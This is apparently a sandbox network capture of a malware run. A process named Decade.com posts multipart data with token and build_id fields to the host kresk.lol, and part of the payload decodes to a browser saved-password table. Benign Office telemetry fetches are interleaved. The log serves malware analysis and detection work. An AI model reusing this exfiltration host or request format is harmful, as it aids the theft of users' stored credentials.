2024-12-04 11:17:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:27 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: f6fadb53-501e-0064-5acb-451f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111727Z-1746fd949bdw2rg8hC1EWR11u400000001g0000000000fq5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:27 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49826	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:27 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HLNYCBIMYUSRIEC26FKN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4c 4e 59 43 42 49 4d 59 55 53 52 49 45 43 32 36 46 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 59 43 42 49 4d 59 55 53 52 49 45 43 32 36 46 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 59 43 42 49 4d 59 55 53 52 49 45 43 32 36 46 4b 4e 0d 0a 43 6f 6e 74 Data Ascii: ------HLNYCBIMYUSRIEC26FKNContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------HLNYCBIMYUSRIEC26FKNContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------HLNYCBIMYUSRIEC26FKNCont
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:27 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:27 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111727Z-1746fd949bdkw94lhC1EWRxuz4000000015g000000008vy6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:27 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49832	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:29 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:29 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------L6XBA1NYM7G47Q9000R1Cont
2024-12-04 11:17:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:29 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:29 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:30 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:29 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:29 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 7057cc02-501e-008f-16cc-459054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111729Z-1746fd949bd4w8sthC1EWR700400000000tg000000007612 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
